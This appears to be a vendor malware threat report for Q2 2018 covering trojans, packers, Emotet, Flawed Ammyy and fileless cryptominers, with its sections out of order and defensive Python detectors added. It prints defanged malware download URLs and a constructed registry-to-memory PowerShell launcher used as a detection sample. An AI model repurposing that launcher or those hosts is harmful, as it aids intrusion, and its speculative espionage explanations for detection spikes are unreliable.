Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a “severe” virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a “Remote Service Account”.

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.

5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2 Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a “Severe” malware threat to PC users.

In Q2 Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

Malware that is “packed” refers to any means used to hide or obfuscate malicious executable code by compressing or “packing” it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified “Ultimate Packer for Executables”, dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
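The two signs a defender looks for when triaging a packed Windows sample both live in the PE section table: stock UPX leaves sections named UPX0/UPX1, while a modified build that renames them still carries a high-entropy section holding the compressed (or encrypted) original program. The following Python script, an added example that is not part of the Comodo report or any Comodo tooling, parses the section table and checks both signs; the three PE images it scans are constructed inline so it runs offline.

```python
"""Heuristic packer check for PE files (added example, not Comodo's tooling)."""
import math
import struct

ENTROPY_THRESHOLD = 7.0   # ordinary x86 code usually measures around 5 to 6.5 bits/byte
MIN_SECTION_BYTES = 256   # tiny sections give meaningless entropy estimates


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant run, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Walk the PE section table and return [(name, raw_section_bytes), ...]."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (n_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + opt_size          # section headers follow the optional header
    sections = []
    for i in range(n_sections):
        off = table + i * 40              # each IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)
        sections.append((name, pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def packer_indicators(pe: bytes):
    """Return [(section_name, reason, entropy), ...] for sections that look packed."""
    findings = []
    for name, data in parse_sections(pe):
        ent = shannon_entropy(data)
        if name.upper().startswith("UPX"):
            # Stock UPX names its sections UPX0/UPX1; a "modified" UPX usually renames them.
            findings.append((name, "stock UPX section name", ent))
        if len(data) >= MIN_SECTION_BYTES and ent >= ENTROPY_THRESHOLD:
            # Compressed or encrypted payloads look random, whatever the section is called.
            findings.append((name, "high-entropy section (compressed or encrypted payload)", ent))
    return findings


def build_sample_pe(sections):
    """Construct a minimal PE32 container with the given (name, data) sections.

    Constructed for this example only; it has no entry point and never runs."""
    n = len(sections)
    opt_size = 224                                   # PE32 optional header size
    headers = 0x40 + 4 + 20 + opt_size + 40 * n
    headers = (headers + 0x1FF) & ~0x1FF             # round up to 512-byte file alignment
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew points at the PE signature
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    table, body, raw_ptr = bytearray(), bytearray(), headers
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(data), 0x1000 + raw_ptr,
                             len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data
        raw_ptr += len(data)
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)
    return image.ljust(headers, b"\0") + bytes(body)


# Constructed samples: a uniform byte pattern has entropy 8.0, a NOP sled 0.0.
UNIFORM = bytes(range(256)) * 4
SAMPLE_UPX = build_sample_pe([(b"UPX0", b""), (b"UPX1", UNIFORM)])
SAMPLE_RENAMED = build_sample_pe([(b".text", b"\x90" * 1024), (b".data", UNIFORM)])
SAMPLE_CLEAN = build_sample_pe([(b".text", b"\x90" * 1024)])

if __name__ == "__main__":
    for label, sample in [("stock UPX", SAMPLE_UPX), ("renamed packer", SAMPLE_RENAMED),
                          ("clean", SAMPLE_CLEAN)]:
        print(label, packer_indicators(sample) or "no packer indicators")
```

The entropy test is a heuristic: legitimate installers and resource-heavy binaries also carry compressed sections, so treat a hit as a reason to unpack and inspect, not as a verdict.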

In Q2 2018 Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to “kill” them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

“Joke” malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a “Medium” threat because the hacker’s intention is not to damage or destroy information, but merely to have fun at the victim’s expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a “Potentially Unwanted Application” or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as “poor reputation” software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and “system optimizers”.

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite, and include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to “crack” or patch unregistered copies of Microsoft software. These are referred to as “hacktools” and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical Analysis

In this section let’s examine unique malware profiles that Comodo identified within specific “verticals”, or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical’s top malware type.

Let’s take a closer look at two trojans, Kryptik and Zbot, that were the top detected in not only one but multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host’s FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan “Clicker” to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let’s examine “Zbot”, which is another name for the “Zeus” Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target’s computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which, these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo’s aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or “cracking” software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia’s 2018 political revolution was accompanied by Comodo’s largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that “information wants to be free”. Evidence for this argument is provided by this timeline, which shows Comodo’s Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of “fake news”, Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.


Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.



2.1 The Most Widespread Trojan

The most proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.

If a user takes the bait and runs the file, it copies itself to the appdata folder as D5E2DEE36C7A.exe, then launches itself from that location and starts to gather credentials present in the system.

It collects credentials and private data from known browsers, email clients, FTP clients, WebDAV and SCP clients. Then it sends all the collected data to the attackers' server, httpcallbedmlpackfarefrephp.

The phishing email


2.2 PowerShell-based attack with Emotet

Another alarming trend is related to malware itself rather than its delivery method. Often cybercriminals use malware based not on Windows native exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.

Emotet is one of the most aggressive trojans currently active in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.

The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice that the message is written in a cheerful manner to inspire user trust.

The phishing email


The attached file is an Office document containing a VBScript. As the default settings of a newly installed Microsoft Office do not allow execution of such scripts, the attackers added a special option to convince the victims to turn on VBScript execution.

The special option to convince the victims to turn on VBScript execution


The purpose of the VBScript is to launch PowerShell.


The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY

At the time of writing, only the thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).

The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service, "lanesviewer", to ensure persistence.

The malware creates the "lanesviewer" service to ensure persistence


After that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.

The next example is even more cunning because it infects computers with popular legitimate Microsoft software.

2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief.

Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.


As you can see on the diagram, Ammyy Admin was used in spreading many types of nefarious malware.

The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It's a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets the attackers use functions such as remote desktop control, file system manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.

The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noticing is the fact that these tricks are also based on using legitimate software, from Microsoft this time.


Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly in MS Excel.

The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.
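As an added illustration (not code from the Comodo report), the following Python parses the IQY layout described above and flags attachments a mail gateway should hold rather than deliver. The line layout (WEB, version, URL, then Key=Value parameters), the parameter names Selection and Formatting, the allow-list and both sample files are assumptions or constructed for this example.

```python
"""Mail-gateway style check for Excel Web Query (.iqy) attachments.

Added example, not code from the Comodo report. It assumes the common
IQY layout: line 1 'WEB', line 2 a version number, line 3 the URL,
optional 'Key=Value' parameter lines after that. Hosts outside an
allow-list (constructed here) are flagged.
"""
from urllib.parse import urlparse

# Constructed allow-list: internal data sources a business legitimately queries.
ALLOWED_HOSTS = {"reports.example.internal", "finance.example.internal"}


def parse_iqy(text: str) -> dict:
    """Parse IQY content into {'kind', 'version', 'url', 'params'}.

    Raises ValueError if the header does not look like a web query.
    """
    lines = [ln.strip() for ln in text.replace("\r\n", "\n").split("\n")]
    lines = [ln for ln in lines if ln]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not a WEB query file")
    params = {}
    for ln in lines[3:]:
        if "=" in ln:
            key, value = ln.split("=", 1)
            params[key.strip()] = value.strip()
    return {"kind": lines[0].upper(), "version": lines[1], "url": lines[2], "params": params}


def assess_iqy(text: str) -> list:
    """Return the reasons the attachment should be blocked (empty list = allow)."""
    reasons = []
    try:
        query = parse_iqy(text)
    except ValueError as exc:
        return [f"unparseable: {exc}"]
    url = urlparse(query["url"])
    if url.scheme not in ("http", "https"):
        reasons.append(f"unexpected scheme {url.scheme!r}")
    host = (url.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        reasons.append(f"host {host!r} not in allow-list")
    # Formatting=None asks Excel to take whatever the server returns verbatim,
    # which is how a query that fetches arbitrary content rather than a table looks.
    if query["params"].get("Formatting", "").lower() == "none":
        reasons.append("Formatting=None (raw content returned to Excel)")
    return reasons


# Constructed samples (not from the report).
BENIGN_IQY = "WEB\n1\nhttps://reports.example.internal/q1.html\nSelection=1\nFormatting=All\n"
SUSPICIOUS_IQY = "WEB\n1\nhttp://malicious-example.invalid/a\nSelection=1\nFormatting=None\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_IQY), ("suspicious", SUSPICIOUS_IQY)):
        print(name, assess_iqy(sample) or "allow")
```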

Malware runs PowerShell


Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.

2.4 The growth of Flawed Ammyy attacks for Q2

The growth of Flawed Ammyy attacks for Q2

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.

Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks can only be discovered too late, after money is withdrawn from a bank account, confidential data is published, etc. The merging of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.

To fight these attacks, cybersecurity departments need to rearrange their approach to security measures in line with the new trends above. Combining the best malware detection tools and methods of protecting data, built on defense-in-depth principles, provides the most promising solution.

[Chart: values 43188, 46382, 48881 over Apr, May, Jun]


3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new dangerous abilities.

Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason, many users did not regard them as particularly dangerous: at least, most cryptominers did not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has radically changed.

New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware is malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.

Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.


Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes: PowerShell to execute commands, Task Scheduler to ensure persistence and the Registry to hold the malicious binary code. In the screenshots below you can see exactly how the malware, dubbed BadShell, works.

If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
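Both the Emotet chain in section 2.2 and BadShell here hinge on PowerShell launched with an encoded argument, which is the one step a defender can decode and score. The Python below is an added example (not the report's or Comodo's code): it recovers the script from a -EncodedCommand argument and flags the registry-read plus in-memory-execution combination described above. The sample command lines, the registry key and the indicator list are constructed for the example.

```python
"""Decode a PowerShell -EncodedCommand argument and score it for the
fileless-miner pattern described above (registry-resident payload,
in-memory execution, hidden window).

Added example, not part of the Comodo report. The sample command lines
are constructed for illustration; the indicator list is a starting point
for a detection rule, not a complete signature.
"""
import base64
import re

# Indicator strings a defender would expect in a BadShell-style launcher.
INDICATORS = {
    "registry_read": re.compile(r"Get-ItemProperty|HKCU:|HKLM:|Registry::", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "in_memory_exec": re.compile(r"Reflection\.Assembly|Invoke-Expression|\biex\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", re.I),
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
ENC_FLAG = re.compile(r"-(e|ec|enc|encodedcommand)", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded command, else None.

    PowerShell expects the argument to be base64 of UTF-16LE text.
    """
    parts = cmdline.split()
    for i, part in enumerate(parts[:-1]):
        if ENC_FLAG.fullmatch(part):
            try:
                return base64.b64decode(parts[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def score_command(cmdline: str) -> dict:
    """Return {'decoded': str | None, 'hits': [...], 'suspicious': bool}."""
    script = decode_encoded_command(cmdline)
    # Scan the visible command line and the decoded script together, since
    # window-hiding flags live on the former and the payload logic on the latter.
    text = cmdline + "\n" + (script or "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Encoded launch + registry read + in-memory execution is the combination to alert on.
    suspicious = script is not None and "registry_read" in hits and "in_memory_exec" in hits
    return {"decoded": script, "hits": hits, "suspicious": suspicious}


def encode_for_powershell(script: str) -> str:
    """Helper used only to build the constructed samples below."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample (hypothetical key name): a launcher that pulls a blob from
# the registry and runs it in memory, the shape BadShell's screenshots show.
CONSTRUCTED_LAUNCHER = (
    "$b=(Get-ItemProperty 'HKCU:\\Software\\ConstructedKey').Blob;"
    "[Reflection.Assembly]::Load([Convert]::FromBase64String($b))"
)
SAMPLE_MALICIOUS = "powershell.exe -nop -w hidden -enc " + encode_for_powershell(CONSTRUCTED_LAUNCHER)
# Constructed benign sample: an encoded but harmless administrative one-liner.
SAMPLE_BENIGN = "powershell.exe -enc " + encode_for_powershell("Get-Date | Out-File C:\\temp\\date.txt")

if __name__ == "__main__":
    for label, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        result = score_command(sample)
        print(label, result["suspicious"], result["hits"])
```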

BadShell at work


The malicious code in the registry


This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.

Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.

